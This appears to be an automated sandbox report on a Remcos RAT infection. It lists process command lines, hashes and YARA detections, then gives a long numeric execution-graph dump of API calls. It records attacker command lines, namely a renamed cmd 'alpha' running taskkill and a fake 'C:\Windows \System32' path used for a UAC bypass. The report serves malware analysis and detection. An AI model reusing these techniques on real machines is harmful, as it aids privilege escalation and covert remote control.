                                                                            Start date:03/07/2024
                                                                            Path:C:\Windows\SysWOW64\colorcpl.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:C:\Windows\System32\colorcpl.exe
                                                                            Imagebase:0x630000
                                                                            File size:86'528 bytes
                                                                            MD5 hash:DB71E132EBF1FEB6E93E8A2A0F0C903D
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Yara matches:
                                                                            • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000001F.00000002.3702973204.0000000004580000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                            • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 0000001F.00000002.3702973204.0000000004580000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                            • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 0000001F.00000002.3702973204.0000000004580000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                            • Rule: REMCOS_RAT_variants, Description: unknown, Source: 0000001F.00000002.3702973204.0000000004580000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                            • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 0000001F.00000002.3702973204.0000000004580000.00000040.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                                                            • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000001F.00000002.3694699773.000000000281F000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                            • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000001F.00000002.3705302881.0000000006420000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                            • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 0000001F.00000002.3705302881.0000000006420000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                            • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 0000001F.00000002.3705302881.0000000006420000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                            • Rule: REMCOS_RAT_variants, Description: unknown, Source: 0000001F.00000002.3705302881.0000000006420000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                            • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 0000001F.00000002.3705302881.0000000006420000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                                                            Has exited:false

                                                                            Target ID:34
                                                                            Start time:02:57:03
                                                                            Start date:03/07/2024
                                                                            Path:C:\Windows \System32\per.exe
                                                                            Wow64 process (32bit):false
                                                                            Commandline:"C:\\Windows \\System32\\per.exe"
                                                                            Imagebase:0x7ff6ef4b0000
                                                                            File size:49'664 bytes
                                                                            MD5 hash:85018BE1FD913656BC9FF541F017EACD
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Antivirus matches:
                                                                            • Detection: 3%, ReversingLabs
                                                                            • Detection: 0%, Virustotal, Browse
                                                                            Has exited:true

                                                                            Target ID:38
                                                                            Start time:02:57:06
                                                                            Start date:03/07/2024
                                                                            Path:C:\Users\Public\alpha.exe
                                                                            Wow64 process (32bit):false
                                                                            Commandline:C:\\Users\\Public\\alpha /c taskkill /F /IM SystemSettings.exe
                                                                            Imagebase:0x7ff64b560000
                                                                            File size:289'792 bytes
                                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Has exited:true

                                                                            Target ID:39
                                                                            Start time:02:57:06
                                                                            Start date:03/07/2024
                                                                            Path:C:\Windows\System32\taskkill.exe
                                                                            Wow64 process (32bit):false
                                                                            Commandline:taskkill /F /IM SystemSettings.exe
                                                                            Imagebase:0x7ff7c6b00000
                                                                            File size:101'376 bytes
                                                                            MD5 hash:A599D3B2FAFBDE4C1A6D7D0F839451C7
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Has exited:true

                                                                            Target ID:40
                                                                            Start time:02:57:06
                                                                            Start date:03/07/2024
                                                                            Path:C:\Windows\System32\SystemSettingsAdminFlows.exe
                                                                            Wow64 process (32bit):false
                                                                            Commandline:"C:\Windows\system32\SystemSettingsAdminFlows.exe" OptionalFeaturesAdminHelper
                                                                            Imagebase:0x7ff71c770000
                                                                            File size:519'080 bytes
                                                                            MD5 hash:5FA3EEF00388ED6344B4C35BA7CAA460
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Has exited:false

                                                                            Target ID:42
                                                                            Start time:02:57:07
                                                                            Start date:03/07/2024
                                                                            Path:C:\Users\Public\alpha.exe
                                                                            Wow64 process (32bit):false
                                                                            Commandline:C:\\Users\\Public\\alpha /c ping 127.0.0.1 -n 2
                                                                            Imagebase:0x7ff64b560000
                                                                            File size:289'792 bytes
                                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Has exited:true


                                                                              Execution Graph

                                                                              Execution Coverage:20.9%
                                                                              Dynamic/Decrypted Code Coverage:100%
                                                                              Signature Coverage:37.8%
                                                                              Total number of Nodes:2000
                                                                              Total number of Limit Nodes:16
                                                                              [Execution graph rendering omitted: the node/edge dump of the execution_graph view does not survive as readable text. API calls named on the graph nodes include: SysAllocStringLen, SysReAllocStringLen, SysFreeString, GetPEB, LoadLibraryA, LoadLibraryExA, LoadLibraryW, FreeLibrary, timeSetEvent, GetStdHandle, WriteFile, MessageBoxA, ExitProcess, VirtualAlloc, VirtualFree, LocalAlloc, TlsSetValue, TlsGetValue, RtlMoveMemory, GetModuleFileNameA, GetModuleHandleW, GetProcAddress, RegOpenKeyA, RegOpenKeyExA, RegQueryValueExA, RegSetValueExA, RegCloseKey, lstrcpynA, lstrlenA, GetThreadLocale, GetLocaleInfoA, EnumSystemLocalesA, CompareStringA, Sleep, QueryPerformanceCounter, GetTickCount, InetIsOffline, WinExec, GetCurrentProcess, NtAllocateVirtualMemory, NtWriteVirtualMemory, NtFlushInstructionCache.]
GetFileAttributesA 36970->36971 36972 2987e35 36971->36972 36972->36084 36972->36086 36974 2984b78 11 API calls 36973->36974 36975 299cee0 36974->36975 36976 299cf01 36975->36976 36977 29849a4 11 API calls 36975->36977 36976->36179 36977->36975 36979 299c7ca 36978->36979 37449 2984ecc 36979->37449 36981 299c7d2 36982 299c7f2 RtlDosPathNameToNtPathName_U 36981->36982 37455 299c6fc 36982->37455 36985 299c839 36986 29849a4 11 API calls 36985->36986 36987 299c84b NtWriteFile NtClose 36986->36987 36988 299c875 36987->36988 37457 2984c0c 36988->37457 36991 29844ac 11 API calls 36992 299c885 36991->36992 36992->36084 36994 29981c0 36993->36994 36995 298480c 11 API calls 36994->36995 36996 2998203 36995->36996 36997 2984798 11 API calls 36996->36997 36998 2998228 36997->36998 36999 2997e14 25 API calls 36998->36999 37000 2998243 36999->37000 37001 298480c 11 API calls 37000->37001 37002 299825c 37001->37002 37003 2984798 11 API calls 37002->37003 37004 2998281 37003->37004 37005 2997e14 25 API calls 37004->37005 37006 299829c 37005->37006 37007 2999c93 37006->37007 37008 298480c 11 API calls 37006->37008 37009 29844d0 11 API calls 37007->37009 37013 29982cd 37008->37013 37010 2999cb0 37009->37010 37011 29844d0 11 API calls 37010->37011 37012 2999cc0 37011->37012 37014 2984c0c SysFreeString 37012->37014 37016 2984798 11 API calls 37013->37016 37015 2999ccb 37014->37015 37017 29844d0 11 API calls 37015->37017 37021 29982f2 37016->37021 37018 2999cdb 37017->37018 37019 29844ac 11 API calls 37018->37019 37020 2999ce3 37019->37020 37022 29844d0 11 API calls 37020->37022 37024 2997e14 25 API calls 37021->37024 37023 2999cf0 37022->37023 37025 29844d0 11 API calls 37023->37025 37026 299830d 37024->37026 37027 2999cfd 37025->37027 37028 298480c 11 API calls 37026->37028 37027->35939 37029 2998326 37028->37029 37030 2984798 11 API calls 37029->37030 37031 299834b 37030->37031 37032 2997e14 25 API calls 37031->37032 37033 2998366 37032->37033 37033->37007 37034 298480c 11 API calls 
37033->37034 37035 29983ae 37034->37035 37036 2984798 11 API calls 37035->37036 37037 29983d3 37036->37037 37038 2997e14 25 API calls 37037->37038 37039 29983ee 37038->37039 37040 298480c 11 API calls 37039->37040 37041 2998407 37040->37041 37042 2984798 11 API calls 37041->37042 37043 299842c 37042->37043 37044 2997e14 25 API calls 37043->37044 37045 2998447 37044->37045 37046 298480c 11 API calls 37045->37046 37047 299848c 37046->37047 37048 2984798 11 API calls 37047->37048 37049 29984b1 37048->37049 37050 2997e14 25 API calls 37049->37050 37051 29984cc 37050->37051 37052 298480c 11 API calls 37051->37052 37053 29984e5 37052->37053 37054 2984798 11 API calls 37053->37054 37055 299850d 37054->37055 37056 2997e14 25 API calls 37055->37056 37057 299852b 37056->37057 37058 298480c 11 API calls 37057->37058 37059 2998547 37058->37059 37060 2984798 11 API calls 37059->37060 37061 2998578 37060->37061 37062 2997e14 25 API calls 37061->37062 37063 299859c 37062->37063 37064 298480c 11 API calls 37063->37064 37065 29985b8 37064->37065 37066 2984798 11 API calls 37065->37066 37067 29985e9 37066->37067 37068 2997e14 25 API calls 37067->37068 37069 299860d 37068->37069 37070 298480c 11 API calls 37069->37070 37071 2998629 37070->37071 37072 2984798 11 API calls 37071->37072 37073 299865a 37072->37073 37074 2997e14 25 API calls 37073->37074 37375 2984950 GetModuleHandleA 37374->37375 37375->36489 37407 2984544 37376->37407 37379 2984798 11 API calls 37380 2997d7f 37379->37380 37381 2997d87 GetModuleHandleA GetProcAddress VirtualProtect 37380->37381 37382 2997dc3 37381->37382 37383 29844d0 11 API calls 37382->37383 37384 2997dd0 37383->37384 37384->36492 37386 2984500 11 API calls 37385->37386 37387 2997b7f 37386->37387 37388 298480c 11 API calls 37387->37388 37389 2997bd0 37388->37389 37390 2997bd8 GetModuleHandleW GetProcAddress GetCurrentProcess 37389->37390 37391 2997c03 37390->37391 37392 29844ac 11 API calls 37391->37392 37393 2997c0b 37392->37393 37394 2997a94 
37393->37394 37395 2984500 11 API calls 37394->37395 37396 2997ab7 37395->37396 37397 2984798 11 API calls 37396->37397 37398 2997aca 37397->37398 37399 2997ad2 GetModuleHandleA GetProcAddress NtWriteVirtualMemory 37398->37399 37400 2997b0f 37399->37400 37401 29844ac 11 API calls 37400->37401 37402 2997b17 37401->37402 37402->36497 37404 29844d6 37403->37404 37405 29844fc 37404->37405 37406 2982c2c 11 API calls 37404->37406 37405->35748 37406->37404 37409 2984548 37407->37409 37408 298456c 37408->37379 37409->37408 37410 2982c2c 11 API calls 37409->37410 37410->37408 37426 2999ef8 37411->37426 37414 299a18e 37414->36526 37415 299a183 CreateToolhelp32Snapshot 37415->36526 37417 2999ef8 17 API calls 37416->37417 37418 299a19f 37417->37418 37419 299a1ae 37418->37419 37420 299a1a3 Process32First 37418->37420 37419->36533 37420->36533 37422 2999ef8 17 API calls 37421->37422 37423 299a1bf 37422->37423 37424 299a1ce 37423->37424 37425 299a1c3 Process32Next 37423->37425 37424->36533 37425->36533 37427 299a03c 37426->37427 37428 2999f07 GetModuleHandleA 37426->37428 37427->37414 37427->37415 37428->37427 37429 2999f1c 16 API calls 37428->37429 37429->37427 37430->36537 37447->36963 37448->36963 37450 2984ee8 37449->37450 37451 2984ed2 SysAllocStringLen 37449->37451 37450->36981 37451->37450 37452 2984bdc 37451->37452 37453 2984bf8 37452->37453 37454 2984be8 SysAllocStringLen 37452->37454 37453->36981 37454->37452 37454->37453 37456 299c720 NtCreateFile 37455->37456 37456->36985 37458 2984c20 37457->37458 37459 2984c12 SysFreeString 37457->37459 37458->36991 37459->37458 37466 29a23b3 37467 298480c 11 API calls 37466->37467 37468 29a23d4 37467->37468 37469 298494c 37468->37469 37470 29a23df 37469->37470 37471 29a23ec 37470->37471 37472 2984798 11 API calls 37471->37472 37473 29a240b 37472->37473 37474 29a2416 37473->37474 37475 29a2423 37474->37475 37476 2997e14 25 API calls 37475->37476 37477 29a242f 37476->37477 37478 298480c 11 API calls 37477->37478 37479 29a2450 
37478->37479 37480 298494c 37479->37480 37481 29a245b 37480->37481 37482 2984798 11 API calls 37481->37482 37483 29a2487 37482->37483 37484 298494c 37483->37484 37485 29a2492 37484->37485 37486 2997e14 25 API calls 37485->37486 37487 29a24ab 37486->37487 37488 298480c 11 API calls 37487->37488 37489 29a24cc 37488->37489 37490 29a24d7 37489->37490 37491 2984798 11 API calls 37490->37491 37492 29a2503 37491->37492 37493 29a250e 37492->37493 37494 2997e14 25 API calls 37493->37494 37495 29a2527 37494->37495 37496 298480c 11 API calls 37495->37496 37497 29a2548 37496->37497 37498 29a2560 37497->37498 37499 2984798 11 API calls 37498->37499 37500 29a257f 37499->37500 37501 2997e14 25 API calls 37500->37501 37502 29a25a3 37501->37502 37503 298480c 11 API calls 37502->37503 37504 29a25c4 37503->37504 37505 29a25dc 37504->37505 37506 2984798 11 API calls 37505->37506 37507 29a25fb 37506->37507 37508 2997e14 25 API calls 37507->37508 37509 29a261f 37508->37509 37510 298480c 11 API calls 37509->37510 37511 29a2640 37510->37511 37512 29a2658 37511->37512 37513 2984798 11 API calls 37512->37513 37514 29a2677 37513->37514 37515 2997e14 25 API calls 37514->37515 37516 29a269b 37515->37516 37517 298480c 11 API calls 37516->37517 37518 29a26bc 37517->37518 37519 29a26d4 37518->37519 37520 2984798 11 API calls 37519->37520 37521 29a26f3 37520->37521 37522 2997e14 25 API calls 37521->37522 37523 29a2717 37522->37523 37524 298480c 11 API calls 37523->37524 37525 29a2738 37524->37525 37526 29a2750 37525->37526 37527 2984798 11 API calls 37526->37527 37528 29a276f 37527->37528 37529 2997e14 25 API calls 37528->37529 37530 29a2793 37529->37530 37531 298480c 11 API calls 37530->37531 37532 29a27b4 37531->37532 37533 29a27cc 37532->37533 37534 2984798 11 API calls 37533->37534 37535 29a27eb 37534->37535 37536 29a27f6 37535->37536 37537 29a2803 37536->37537 37538 2997e14 25 API calls 37537->37538 37539 29a280f 37538->37539 37540 299d270 11 API calls 37539->37540 37541 29a282a 37540->37541 
37542 298480c 11 API calls 37541->37542 37543 29a2853 37542->37543 37544 29a285e 37543->37544 37545 29a286a 37544->37545 37546 298480c 11 API calls 37545->37546 37547 29a288b 37546->37547 37548 29a2896 37547->37548 37549 29a28a3 37548->37549 37550 2984798 11 API calls 37549->37550 37551 29a28c2 37550->37551 37552 29a28cd 37551->37552 37553 29a28da 37552->37553 37554 2997e14 25 API calls 37553->37554 37555 29a28e6 37554->37555 37556 298480c 11 API calls 37555->37556 37557 29a2907 37556->37557 37558 2984798 11 API calls 37557->37558 37559 29a293e 37558->37559 37560 2997e14 25 API calls 37559->37560 37561 29a2962 37560->37561 37562 299cec8 11 API calls 37561->37562 37563 29a2977 37562->37563 37564 29a2998 37563->37564 37565 298480c 11 API calls 37564->37565 37566 29a29b9 37565->37566 37567 29a29d1 37566->37567 37568 2984798 11 API calls 37567->37568 37569 29a29f0 37568->37569 37570 29a2a08 37569->37570 37571 2997e14 25 API calls 37570->37571 37572 29a2a14 37571->37572 37573 298480c 11 API calls 37572->37573 37574 29a2a35 37573->37574 37575 29a2a40 37574->37575 37576 2984798 11 API calls 37575->37576 37577 29a2a6c 37576->37577 37578 29a2a77 37577->37578 37579 2997e14 25 API calls 37578->37579 37580 29a2a90 37579->37580 37581 298480c 11 API calls 37580->37581 37582 29a2ab1 37581->37582 37583 2984798 11 API calls 37582->37583 37584 29a2ae8 37583->37584 37585 29a2af3 37584->37585 37586 2997e14 25 API calls 37585->37586 37587 29a2b0c 37586->37587 37588 2987e20 GetFileAttributesA 37587->37588 37589 29a2b16 37588->37589 37590 29a2b1e 37589->37590 37591 29a2df5 37589->37591 37592 298480c 11 API calls 37590->37592 37593 298480c 11 API calls 37591->37593 37594 29a2b3f 37592->37594 37595 29a2e16 37593->37595 37596 29a2b4a 37594->37596 37598 29a2e2e 37595->37598 37597 29a2b57 37596->37597 37599 2984798 11 API calls 37597->37599 37600 2984798 11 API calls 37598->37600 37601 29a2b76 37599->37601 37604 29a2e4d 37600->37604 37602 29a2b81 37601->37602 37603 29a2b8e 37602->37603 37605 
2997e14 25 API calls 37603->37605 37606 2997e14 25 API calls 37604->37606 37607 29a2b9a 37605->37607 37608 29a2e71 37606->37608 37609 298480c 11 API calls 37607->37609 37610 298480c 11 API calls 37608->37610 37611 29a2bbb 37609->37611 37612 29a2e92 37610->37612 37613 29a2bc6 37611->37613 37614 29a2eaa 37612->37614 37615 29a2bd3 37613->37615 37617 2984798 11 API calls 37614->37617 37616 2984798 11 API calls 37615->37616 37618 29a2bf2 37616->37618 37620 29a2ec9 37617->37620 37619 29a2c0a 37618->37619 37621 2997e14 25 API calls 37619->37621 37622 2997e14 25 API calls 37620->37622 37623 29a2c16 37621->37623 37624 29a2eed 37622->37624 37625 298480c 11 API calls 37623->37625 37626 298480c 11 API calls 37624->37626 37627 29a2c37 37625->37627 37628 29a2f0e 37626->37628 37630 29a2c42 37627->37630 37629 29a2f26 37628->37629 37631 2984798 11 API calls 37629->37631 37632 2984798 11 API calls 37630->37632 37633 29a2f45 37631->37633 37634 29a2c6e 37632->37634 37635 29a2f5d 37633->37635 37636 29a2c79 37634->37636 37638 2997e14 25 API calls 37635->37638 37637 2997e14 25 API calls 37636->37637 37639 29a2c92 37637->37639 37640 29a2f69 37638->37640 37641 299cec8 11 API calls 37639->37641 37642 298480c 11 API calls 37640->37642 37643 29a2ca7 37641->37643 37644 29a2f8a 37642->37644 37645 2984500 11 API calls 37643->37645 37649 29a2f95 37644->37649 37646 29a2cb7 37645->37646 37647 298480c 11 API calls 37646->37647 37648 29a2cd8 37647->37648 37652 29a2ce3 37648->37652 37650 2984798 11 API calls 37649->37650 37651 29a2fc1 37650->37651 37655 29a2fcc 37651->37655 37653 2984798 11 API calls 37652->37653 37654 29a2d0f 37653->37654 37659 29a2d1a 37654->37659 37656 2997e14 25 API calls 37655->37656 37657 29a2fe5 37656->37657 37658 29849a4 11 API calls 37657->37658 37660 29a2fef 37658->37660 37661 2997e14 25 API calls 37659->37661 37662 29981b8 43 API calls 37660->37662 37663 29a2d33 37661->37663 37664 29a2ffb 37662->37664 37665 298480c 11 API calls 37663->37665 37666 298480c 11 API calls 
37664->37666 37668 29a2d54 37665->37668 37667 29a301c 37666->37667 37669 29a3027 37667->37669 37671 2984798 11 API calls 37668->37671 37670 2984798 11 API calls 37669->37670 37672 29a3053 37670->37672 37673 29a2d8b 37671->37673 37674 29a305e 37672->37674 37675 2997e14 25 API calls 37673->37675 37676 2997e14 25 API calls 37674->37676 37677 29a2daf 37675->37677 37678 29a3077 37676->37678 37680 29a2dc0 37677->37680 37679 298480c 11 API calls 37678->37679 37681 29a3098 37679->37681 37682 299c7b4 18 API calls 37680->37682 37683 2984798 11 API calls 37681->37683 37682->37591 37684 29a30cf 37683->37684 37685 2997e14 25 API calls 37684->37685 37686 29a30f3 Sleep 37685->37686 37687 298480c 11 API calls 37686->37687 37688 29a311e 37687->37688 37689 29a3136 37688->37689 37690 2984798 11 API calls 37689->37690 37691 29a3155 37690->37691 37692 29a316d 37691->37692 37693 2997e14 25 API calls 37692->37693 37694 29a3179 37693->37694 37695 298480c 11 API calls 37694->37695 37696 29a319a 37695->37696 37697 29a31a5 37696->37697 37698 2984798 11 API calls 37697->37698 37699 29a31d1 37698->37699 37700 29a31dc 37699->37700 37701 2997e14 25 API calls 37700->37701 37702 29a31f5 37701->37702 37703 29a3205 37702->37703 38718 299c724 37703->38718 37706 298480c 11 API calls 37707 29a3231 37706->37707 37708 29a323c 37707->37708 37709 2984798 11 API calls 37708->37709 37710 29a3268 37709->37710 37711 29a3273 37710->37711 37712 2997e14 25 API calls 37711->37712 37713 29a328c 37712->37713 37714 298480c 11 API calls 37713->37714 37715 29a32ad 37714->37715 37716 2984798 11 API calls 37715->37716 37717 29a32e4 37716->37717 37718 2997e14 25 API calls 37717->37718 37719 29a3308 37718->37719 37720 298480c 11 API calls 37719->37720 37721 29a3329 37720->37721 37722 2984798 11 API calls 37721->37722 37723 29a3360 37722->37723 37724 2997e14 25 API calls 37723->37724 37725 29a3384 37724->37725 37726 298480c 11 API calls 37725->37726 37727 29a33a5 37726->37727 37728 2984798 11 API calls 37727->37728 37729 
29a33dc 37728->37729 37730 2997e14 25 API calls 37729->37730 37731 29a3400 37730->37731 38729 299cf08 37731->38729 37734 2984500 11 API calls 37735 29a3426 37734->37735 37736 298480c 11 API calls 37735->37736 37737 29a3447 37736->37737 37738 29a3452 37737->37738 37739 2984798 11 API calls 37738->37739 37740 29a347e 37739->37740 37741 29a3489 37740->37741 37742 2997e14 25 API calls 37741->37742 37743 29a34a2 37742->37743 37744 298480c 11 API calls 37743->37744 37745 29a34c3 37744->37745 37746 2984798 11 API calls 37745->37746 37747 29a34fa 37746->37747 37748 2997e14 25 API calls 37747->37748 37749 29a351e 37748->37749 38742 2987a90 37749->38742 37754 2984500 11 API calls 37755 29a354a 37754->37755 37756 298480c 11 API calls 37755->37756 37757 29a356b 37756->37757 37758 2984798 11 API calls 37757->37758 37759 29a35a2 37758->37759 37760 2997e14 25 API calls 37759->37760 37761 29a35c6 37760->37761 37762 298480c 11 API calls 37761->37762 37763 29a35e7 37762->37763 37764 2984798 11 API calls 37763->37764 37765 29a361e 37764->37765 37766 2997e14 25 API calls 37765->37766 37767 29a3642 37766->37767 37768 298480c 11 API calls 37767->37768 37769 29a3663 37768->37769 37770 2984798 11 API calls 37769->37770 37771 29a369a 37770->37771 37772 2997e14 25 API calls 37771->37772 37773 29a36be 37772->37773 37774 298480c 11 API calls 37773->37774 37775 29a36df 37774->37775 37776 2984798 11 API calls 37775->37776 37777 29a3716 37776->37777 37778 2997e14 25 API calls 37777->37778 37779 29a373a 37778->37779 37780 299d270 11 API calls 37779->37780 37781 29a374a 37780->37781 38755 299d2e4 37781->38755 37784 2984500 11 API calls 37785 29a376b 37784->37785 37786 298480c 11 API calls 37785->37786 37787 29a378c 37786->37787 37788 2984798 11 API calls 37787->37788 37789 29a37c3 37788->37789 37790 2997e14 25 API calls 37789->37790 37791 29a37e7 37790->37791 37792 298480c 11 API calls 37791->37792 37793 29a3808 37792->37793 37794 2984798 11 API calls 37793->37794 37795 29a383f 37794->37795 37796 
2997e14 25 API calls 37795->37796 37797 29a3863 37796->37797 37798 298480c 11 API calls 37797->37798 37799 29a3884 37798->37799 37800 2984798 11 API calls 37799->37800 37801 29a38bb 37800->37801 37802 2997e14 25 API calls 37801->37802 37803 29a38df 37802->37803 37804 298480c 11 API calls 37803->37804 37805 29a3900 37804->37805 37806 2984798 11 API calls 37805->37806 37807 29a3937 37806->37807 37808 2997e14 25 API calls 37807->37808 37809 29a395b 37808->37809 37810 298480c 11 API calls 37809->37810 37811 29a397c 37810->37811 37812 2984798 11 API calls 37811->37812 37813 29a39b3 37812->37813 37814 2997e14 25 API calls 37813->37814 37815 29a39d7 37814->37815 37816 298480c 11 API calls 37815->37816 37817 29a39f8 37816->37817 38719 299c725 38718->38719 38720 2984ecc 2 API calls 38719->38720 38721 299c736 RtlInitUnicodeString 38720->38721 38770 2984d9c 38721->38770 38724 299c6fc 38725 299c77d NtDeleteFile 38724->38725 38726 299c795 38725->38726 38727 2984c0c SysFreeString 38726->38727 38728 299c79d 38727->38728 38728->37706 38738 299cf2a 38729->38738 38730 299cfcc 38731 2984b78 11 API calls 38730->38731 38732 299cfe1 38731->38732 38733 2984500 11 API calls 38732->38733 38735 299cfec 38733->38735 38737 29844ac 11 API calls 38735->38737 38739 299d001 38737->38739 38738->38730 38772 2984694 11 API calls 38738->38772 38773 2984500 11 API calls 38738->38773 38740 29844d0 11 API calls 38739->38740 38741 299d00e 38740->38741 38741->37734 38743 2987aa0 38742->38743 38744 2987ac1 38743->38744 38774 2987624 42 API calls 38743->38774 38746 299d348 38744->38746 38748 299d365 38746->38748 38747 299d3c3 38749 29844ac 11 API calls 38747->38749 38748->38747 38775 2984694 11 API calls 38748->38775 38776 2984500 11 API calls 38748->38776 38751 299d3d8 38749->38751 38753 29844ac 11 API calls 38751->38753 38754 299d3e0 38753->38754 38754->37754 38756 2984500 11 API calls 38755->38756 38758 299d2f8 38756->38758 38757 299d33f 38757->37784 38758->38757 38759 29849a4 11 API calls 38758->38759 
38759->38758 38771 2984da0 RtlDosPathNameToNtPathName_U 38770->38771 38771->38724 38772->38738 38773->38738 38774->38744 38775->38748 38776->38748 38819 29a5e01 38820 298480c 11 API calls 38819->38820 38821 29a5e22 38820->38821 38822 2984798 11 API calls 38821->38822 38823 29a5e59 38822->38823 38824 2997e14 25 API calls 38823->38824 38825 29a5e7d 38824->38825 38826 298480c 11 API calls 38825->38826 38827 29a5e9e 38826->38827 38828 2984798 11 API calls 38827->38828 38829 29a5ed5 38828->38829 38830 2997e14 25 API calls 38829->38830 38831 29a5ef9 38830->38831 38832 298480c 11 API calls 38831->38832 38833 29a5f1a 38832->38833 38834 2984798 11 API calls 38833->38834 38835 29a5f51 38834->38835 38836 2997e14 25 API calls 38835->38836 38837 29a5f75 38836->38837 38838 298480c 11 API calls 38837->38838 38839 29a5f96 38838->38839 38840 2984798 11 API calls 38839->38840 38841 29a5fcd 38840->38841 38842 29a5ff1 38841->38842 38843 2997e14 25 API calls 38841->38843 38844 298480c 11 API calls 38842->38844 38843->38842 38845 29a6012 38844->38845 38846 2984798 11 API calls 38845->38846 38847 29a6049 38846->38847 38848 2997e14 25 API calls 38847->38848 38849 29a606d 38848->38849 38850 298480c 11 API calls 38849->38850 38851 29a608e 38850->38851 38852 2984798 11 API calls 38851->38852 38853 29a60c5 38852->38853 38854 2997e14 25 API calls 38853->38854 38855 29a60e9 38854->38855 38856 298480c 11 API calls 38855->38856 38857 29a610a 38856->38857 38858 2984798 11 API calls 38857->38858 38859 29a6141 38858->38859 38860 2997e14 25 API calls 38859->38860 38861 29a6165 38860->38861 38862 298480c 11 API calls 38861->38862 38863 29a6186 38862->38863 38864 2984798 11 API calls 38863->38864 38865 29a61bd 38864->38865 38866 2997e14 25 API calls 38865->38866 38868 29a61e1 38866->38868 38867 29a6a2d 38870 298480c 11 API calls 38867->38870 38868->38867 38869 298480c 11 API calls 38868->38869 38871 29a6217 38869->38871 38872 29a6a4e 38870->38872 38874 2984798 11 API calls 38871->38874 38873 2984798 11 
API calls 38872->38873 38875 29a6a85 38873->38875 38876 29a624e 38874->38876 38877 2997e14 25 API calls 38875->38877 38878 2997e14 25 API calls 38876->38878 38879 29a6aa9 38877->38879 38880 29a6272 38878->38880 38881 298480c 11 API calls 38879->38881 38882 298480c 11 API calls 38880->38882 38884 29a6aca 38881->38884 38883 29a6293 38882->38883 38885 2984798 11 API calls 38883->38885 38886 2984798 11 API calls 38884->38886 38888 29a62ca 38885->38888 38887 29a6b01 38886->38887 38889 2997e14 25 API calls 38887->38889 38890 2997e14 25 API calls 38888->38890 38891 29a6b25 38889->38891 38892 29a62ee 38890->38892 38893 298480c 11 API calls 38891->38893 38894 298480c 11 API calls 38892->38894 38896 29a6b46 38893->38896 38895 29a630f 38894->38895 38897 2984798 11 API calls 38895->38897 38898 2984798 11 API calls 38896->38898 38900 29a6346 38897->38900 38899 29a6b7d 38898->38899 38901 2997e14 25 API calls 38899->38901 38902 2997e14 25 API calls 38900->38902 38908 29a6ba1 38901->38908 38903 29a636a 38902->38903 38904 298480c 11 API calls 38903->38904 38907 29a638b 38904->38907 38905 29a7381 38906 298480c 11 API calls 38905->38906 38911 29a73a2 38906->38911 38909 2984798 11 API calls 38907->38909 38908->38905 38910 298480c 11 API calls 38908->38910 38913 29a63c2 38909->38913 38914 29a6bec 38910->38914 38912 2984798 11 API calls 38911->38912 38917 29a73d9 38912->38917 38916 2997e14 25 API calls 38913->38916 38915 2984798 11 API calls 38914->38915 38921 29a6c23 38915->38921 38918 29a63e6 38916->38918 38920 2997e14 25 API calls 38917->38920 38919 298480c 11 API calls 38918->38919 38925 29a6407 38919->38925 38922 29a73fd 38920->38922 38924 2997e14 25 API calls 38921->38924 38923 298480c 11 API calls 38922->38923 38929 29a741e 38923->38929 38926 29a6c47 38924->38926 38928 2984798 11 API calls 38925->38928 38927 298480c 11 API calls 38926->38927 38932 29a6c68 38927->38932 38931 29a643e 38928->38931 38930 2984798 11 API calls 38929->38930 38935 29a7455 38930->38935 38933 2997e14 25 
